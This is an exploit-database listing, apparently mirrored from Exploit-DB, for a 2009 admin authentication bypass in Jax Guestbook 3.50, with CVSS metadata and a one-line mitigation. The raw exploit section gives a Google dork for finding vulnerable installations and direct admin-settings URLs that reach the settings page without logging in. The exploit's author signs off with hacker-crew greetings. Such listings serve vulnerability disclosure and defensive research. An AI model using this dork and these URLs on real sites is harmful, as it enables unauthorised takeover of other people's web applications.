header-logo
Suggest Exploit
vendor:
Jax Guestbook
by:
Sora
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Jax Guestbook
Affected Version From: 3.5
Affected Version To: 3.5
Patch Exists: YES
Related CWE: N/A
CPE: a:jax_guestbook:jax_guestbook:3.50
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows and Linux
2009

Jax Guestbook 3.50 Admin Login Exploit

Jax Guestbook 3.50 suffers a bug that will allow you to log in as the admin. We can access the admin directory of Jax Guestbook 3.50 to edit the admin settings.

Mitigation:

Ensure that authentication is properly implemented and enforced.
Source

Exploit-DB raw data:

# Exploit Title: Jax Guestbook 3.50 Admin Login Exploit
# Date: December 23rd, 2009
# Author: Sora
# Software Link: http://script.wareseeker.com/ASP-NET/jax-guestbook-3.50.zip/32956d53cf
# Version: 3.50
# Tested on: Windows and Linux

-------------------------------------------
>> Jax Guestbook 3.50 Admin Login Exploit
>> Description: Jax Guestbook 3.50 suffers a bug that will allow you to log in as the admin.
>> Found by: Sora
>> Contact: vhr95zw [at] hotmail.com
>> Google Dork: "inurl:guestbook.admin.php?action=settings"

We can access the admin directory of Jax Guestbook 3.50 to edit the admin settings.

# Code: http://www.site.com/admin/gaestebuch/admin/guestbook.admin.php?action=settings&guestbook_id=0&language=english&gmt_ofs=0 <German>
http://www.site.com/admin/guestbook/admin/guestbook.admin.php?action=settings&guestbook_id=0&language=english&gmt_ofs=0 <English>

# Greetz: Bw0mp, Popc0rn, Xermes, T3eS, Timeb0mb, [H]aruhiSuzumiya, and Revelation!